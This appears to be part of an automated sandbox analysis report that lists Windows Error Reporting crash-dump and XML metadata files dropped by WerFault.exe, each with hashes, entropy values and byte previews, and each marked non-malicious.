                                                                                                                                                                                                                                                              SHA-256:E9740B916909FDF73EB25F1E70223088E17E80E6771BA1E586644542677406CB
                                                                                                                                                                                                                                                              SHA-512:1B3C4D5DAE7287EF8A5E974D7FDE9D2CFAC70822F8E6A1CE1D80BF5E1E5288182EA325EA4C4716A8C52BD00198FE181D756CE4B86CB70E03C12E007913F77DD8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER32EF.tmp.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4753
                                                                                                                                                                                                                                                              Entropy (8bit):4.464512402648456
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:cvIwSD8zskJgtWI97TWSC8Bd8fm8M4Jv6MFfAv+q8vc6ILJsGX7vXw3d:uITfigiSN8JSRvKPILJsGX7vXgd
                                                                                                                                                                                                                                                              MD5:E826EDFB38864830ABE3759CDA64D964
                                                                                                                                                                                                                                                              SHA1:E873E42E77CA0B011BF44A2616A814A94D78DD7D
                                                                                                                                                                                                                                                              SHA-256:133CE84E255AE1177A340F2B6DCFEEEA66034B0DDAC5A6F12C9E968B4640EBBE
                                                                                                                                                                                                                                                              SHA-512:9E95458200E71C52FEA724DD4A63A1FC5E17F556915044A22D833EACA03BC98BF4121F74F9BC3E0D6EF56D4512D0AEF7C629F0AD16682AAE75501F59AC890AD5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4983.tmp.dmp
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:45 2021, 0x1205a4 type
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):99634
                                                                                                                                                                                                                                                              Entropy (8bit):1.9828576437490704
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:DC3W2Ak9bpkazfErHylxzhIkv8lW0U3DSfeDZg1zH1IdYkyNXN9o+s0FHDP:DC3zAksasyXKkv8l96stjP
                                                                                                                                                                                                                                                              MD5:B8D1A8E6D6C7382D9ED80DCE25C42A2F
                                                                                                                                                                                                                                                              SHA1:D3872274171A35FE546DAE4A9ED22ACD9CFA59C2
                                                                                                                                                                                                                                                              SHA-256:84214734DFEF4106844A48D535B124FE377C0D2F61C26DDE221FD9204DFF9EBA
                                                                                                                                                                                                                                                              SHA-512:1515168F4EEF03BF1D87C022D90D54A2AB18A823E4E140CF1F51F9F1275DB7691D7DA5A6F4988F1390E1768554DDFDE6F167C9C5CC460375508C532A3ADE1E51
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: MDMP....... .......]3.`...................U...........B.......$......GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DB.tmp.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4753
                                                                                                                                                                                                                                                              Entropy (8bit):4.463092547999117
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:cvIwSD8zskJgtWI97TWSC8BM8fm8M4Jv6MF1+q8vc6ILJsGX7vXw3d:uITfigiSNrJSoKPILJsGX7vXgd
                                                                                                                                                                                                                                                              MD5:E26E9D255F88D992E78511EDEA3FADF9
                                                                                                                                                                                                                                                              SHA1:945EC689B90356703A4E19ECEBD57CA20262D43B
                                                                                                                                                                                                                                                              SHA-256:CAE1AAC0E291E4AF14844FD194E2799CD81C7FFB27F3EB1050E1027519B60483
                                                                                                                                                                                                                                                              SHA-512:22ED4E71392445AB7C3B9BEC66AA07A918270921199814676E984D9E96A79B7450D26B4894F4C1F8F5D3FC65D77E28C27524ACB82191BDCA20B514F0CD9E0247
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER55D8.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8402
                                                                                                                                                                                                                                                              Entropy (8bit):3.6978315130490094
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:Rrl7r3GLNioR6oW6YSpSU/RUgmfGuSrCpB689bSnqsfXGm:RrlsNiO6Z6YcSU/RUgmfGuSySnJff
                                                                                                                                                                                                                                                              MD5:DB68D6E459836A75F1E0AF2DC6BAA85A
                                                                                                                                                                                                                                                              SHA1:2CE8D49935A1B4FDCC481D03799836985BFCC0D9
                                                                                                                                                                                                                                                              SHA-256:3CB838BDC9B4E336895C5973F459D35E405FEF9677F8D82200E5A92A3A68527E
                                                                                                                                                                                                                                                              SHA-512:40F4D08F3E5531C2F636A079739673811A8E5020B5F9E73BF1222C9CCBB0DCF88B03E3BD2BF3F44E47D5D1631D10A20BE99F8CCCA64F0928CB25D1C92619E4D8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER585A.tmp.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4753
                                                                                                                                                                                                                                                              Entropy (8bit):4.461932434666514
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:cvIwSD8zskJgtWI97TWSC8Bis8fm8M4Jv6MF5O+q8vc6ILJsGX7vXw3d:uITfigiSN8JSVKPILJsGX7vXgd
                                                                                                                                                                                                                                                              MD5:A46FB23426B471BA03A31FDE8720D575
                                                                                                                                                                                                                                                              SHA1:CED3DAA8CC74407B7A14EC4D6EF6C1BC349E9EB9
                                                                                                                                                                                                                                                              SHA-256:7C28650FC1F5DEC46F21CB7B42172FBB7861CF305A9F46FF2E91CEB20F2D13BD
                                                                                                                                                                                                                                                              SHA-512:42F8F054A5A32C667D48CABA88115A6C606F988B4910B8D9F9A5BF62996F13E3BE725A108FBE6982066577800FE559D185BC1FD2A4206B347698EA28ADF0539A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERABCC.tmp.dmp
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:04 2021, 0x1205a4 type
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60446
                                                                                                                                                                                                                                                              Entropy (8bit):1.9975649594048102
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:E2XIa05AgbT3ylxzcBYxZrrab1v2cDuK8Sbq8tHYzTBljqcKyF9:1Ia05AozylxzOY3rWhph8qXEBIA
                                                                                                                                                                                                                                                              MD5:3EDA680C46EC45A8E65D4DB4AC767333
                                                                                                                                                                                                                                                              SHA1:CFF6ECFF168973FFD267A1649458A2F88B9B318B
                                                                                                                                                                                                                                                              SHA-256:1D4A384AC3803A0FB281104685A46862C6E74409B70F261C7854878FC0143EEF
                                                                                                                                                                                                                                                              SHA-512:0D96C97B790B83ABC1D5D1F7CF53DBFCDC41BE82CA8C713493B9593DB3C2E04800615E94E2C7F28E605E40C0DC0A33741C50CACFDF8FA32013629C07C8112A23
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview: MDMP....... .......43.`...................U...........B..............GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3DB.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8398
                                                                                                                                                                                                                                                              Entropy (8bit):3.6958613853599918
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:Rrl7r3GLNioB6Iyi6YSKSU1ygmfGuSrCpB089bknqsfPjMm:RrlsNim6Iyi6YPSU1ygmfGuSgknJf1
                                                                                                                                                                                                                                                              MD5:BC396DA9A4C55BE808F8957D45A75BDA
                                                                                                                                                                                                                                                              SHA1:B82FC5184F1FD8A6CCE6CE4D30801360CBE22ABF
                                                                                                                                                                                                                                                              SHA-256:4C4A11CB625991638B1C94AC99108B026D5E52D225C36346E5036387BAD450B7
                                                                                                                                                                                                                                                              SHA-512:DEBD0015E401E880E7867A27C8E87AF98C7AD4481F9C241891AD382E1EABD7632B750D84172DBB0F47BF4A768568F57B6EDA1D89CCF983B463620B67165DD1E4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB592.tmp.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4753
                                                                                                                                                                                                                                                              Entropy (8bit):4.4599661127230705
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:cvIwSD8zsLJgtWI97TWSC8BE8fm8M4Jv6MFw+q8vc6ILJsGX7vXw3d:uITflgiSNzJSFKPILJsGX7vXgd
                                                                                                                                                                                                                                                              MD5:567A6E034EA0B483BEB8BB0082030E96
                                                                                                                                                                                                                                                              SHA1:F5E2FEE7B5D5899E3F4AB1DAF398EDE53A4F9C5F
                                                                                                                                                                                                                                                              SHA-256:BF95A9735FD0ADDB4B23F80125BB7BEF1CC56E24C46367B091E4595DC9876EB4
                                                                                                                                                                                                                                                              SHA-512:DD4C4B57EB09F498A818D5A683059A0EB5091C4CE847FF058BFDCE73A06AC69E50B5B2BD046E0CA6882F6B5D659248AC92F716F969331B17CA78DB03FB0BEB5E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816314" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB79.tmp.dmp
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:12 2021, 0x1205a4 type
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):87540
                                                                                                                                                                                                                                                              Entropy (8bit):2.19600592359827
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:ttutAzBwX8tErhMA1RUxbYc23OXylxzQzRCRnchtChjbcxIEDwnmI:HMAzBw4AeA3Ux323OXyXQzRCdKtiiDwX
                                                                                                                                                                                                                                                              MD5:8C583E227B6B85DEEBE5B786648E2137
                                                                                                                                                                                                                                                              SHA1:B580344D35DF3DF61CCCA1E4F2DCADFAC515BBCD
                                                                                                                                                                                                                                                              SHA-256:91CB49C253F1E762A49AC001DD9B06F93D474F716BF3B7306E5C3DFAC37D9058
                                                                                                                                                                                                                                                              SHA-512:6468FA16A4DFB3BA9B6E471A8BEFE155B99F2B7C965C1587CB69EA89774ACE7FA0F31D7E7084DBEDD03491DBDE316ABF1FC05BDA28250E967D5302A2532BF6D3
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview: MDMP....... .......<3.`...................U...........B......T.......GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD677.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8400
                                                                                                                                                                                                                                                              Entropy (8bit):3.695637388269918
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:Rrl7r3GLNioa6I296YSBSUGRfgmfGuSrCpBR89bVnqsfKHm:RrlsNid6I296Y0SUGRfgmfGuSfVnJfT
                                                                                                                                                                                                                                                              MD5:C2E720B1A4E9CF17AF4E8ECEF455A2B7
                                                                                                                                                                                                                                                              SHA1:750A0AA48D0E162F4D44B2CB3A4F65EB22C2B5CC
                                                                                                                                                                                                                                                              SHA-256:39EF919FCEFCB20D2B89B7A4F398289638EBF94FC6BAFE003414EFD417A21A2F
                                                                                                                                                                                                                                                              SHA-512:5EB1E91504FF55F7E4A3B61405C7A2FEAF15DCCBC44F7020B6A561B946784AF7ED0FBB7DCFB9FBC73207EB059725756A8773A0697C9A176A944C110E47254F93
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE76.tmp.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4753
                                                                                                                                                                                                                                                              Entropy (8bit):4.4636931605483605
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:cvIwSD8zsLJgtWI97TWSC8BS8fm8M4Jv6MFx+q8vc6ILJsGX7vXw3d:uITflgiSNRJSQKPILJsGX7vXgd
                                                                                                                                                                                                                                                              MD5:8AB32FB89B7F98E921F5C34E2619C25B
                                                                                                                                                                                                                                                              SHA1:759DA4A133E32560168AD5B71B57E82649A0BE9E
                                                                                                                                                                                                                                                              SHA-256:B3E728D937C7FB31FE21BD337B07E0DB1880075618DAB584ECC3CD84CDD3DBCA
                                                                                                                                                                                                                                                              SHA-512:BDA5D9F30B1ED21085ED93D89D9FF8BCF3BA9CC1FC858F43BB05CD8C5459A1623E2C1FDCE076F0AAA3904BDC8BD119FE2C546F479AB40F60CCF0B05A9984D086
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816314" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF661.tmp.dmp
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:23 2021, 0x1205a4 type
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):89920
                                                                                                                                                                                                                                                              Entropy (8bit):1.9805037912276446
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:ovZ6vbhAPkBGylxzXx3rrqw5ym1rPgY62EcOoEj0Gd2ol:P1APMGyXXNrYm1roYMoEIAl
                                                                                                                                                                                                                                                              MD5:90409243EFAE234551EA1C01248C41D0
                                                                                                                                                                                                                                                              SHA1:1AB4AC8A436E2CCE4D708C306504252552CB8092
                                                                                                                                                                                                                                                              SHA-256:83AF683C5FD7E02271F18EF1280ECA5DDB688C5ACCB30AED591A17DE101B7550
                                                                                                                                                                                                                                                              SHA-512:5B9C743BCBBD8742AAE5FC755475E03579AB649FCC37B47AFAA22A1A6F2E0999747518516ACCAE48B69343345AF089BB1F9D404503864AC989C11A92B445D701
                                                                                                                                                                                                                                                              Malicious:false
